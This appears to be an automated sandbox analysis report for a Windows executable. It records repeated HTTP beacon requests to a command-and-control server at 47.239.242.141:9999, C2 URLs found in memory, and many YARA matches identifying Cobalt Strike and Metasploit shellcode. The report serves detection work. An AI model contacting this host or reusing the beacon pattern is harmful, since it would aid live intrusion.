Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache

Source: vNenBbeRFZ.exe, 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:%u/
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/BQPy
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000071E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/BQPy%
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/BQPyHPe)
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/BQPygP
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.js
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jsSX
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jsW
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jskX
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jsl
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jsl#
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jslGX
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jslqX
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jslu
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000071E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jsot

System Summary

Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Shellcode_Generic_8c487e57 Author: unknown
Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D7411E _memset,GetStartupInfoA,GetCurrentDirectoryW,GetCurrentDirectoryW,GetCurrentDirectoryW,CreateProcessWithLogonW,GetLastError,

0_2_03D7411E

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D943C0		0_2_03D943C0
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D82BF1		0_2_03D82BF1
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D92A9D		0_2_03D92A9D
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D92271		0_2_03D92271
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D95210		0_2_03D95210
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D919C8		0_2_03D919C8
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D949E5		0_2_03D949E5
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D91E9D		0_2_03D91E9D
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D9267D		0_2_03D9267D
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D94C40		0_2_03D94C40
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D87C14		0_2_03D87C14
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03991ACB		0_2_03991ACB
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_039912EB		0_2_039912EB
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0399408E		0_2_0399408E
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_039A2802		0_2_039A2802
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0398203F		0_2_0398203F
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03987062		0_2_03987062
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_039916BF		0_2_039916BF
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03991EEB		0_2_03991EEB
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03990E16		0_2_03990E16
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0399465E		0_2_0399465E

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: String function: 03D881DC appears 39 times
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: String function: 0398762A appears 35 times

Source: vNenBbeRFZ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Shellcode_Generic_8c487e57 os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Shellcode.Generic, fingerprint = 834caf96192a513aa93ac48fb8d2f3326bf9f08acaf7a27659f688b26e3e57e4, id = 8c487e57-4b8c-488e-a1d9-786ff935fd2c, last_modified = 2022-07-18
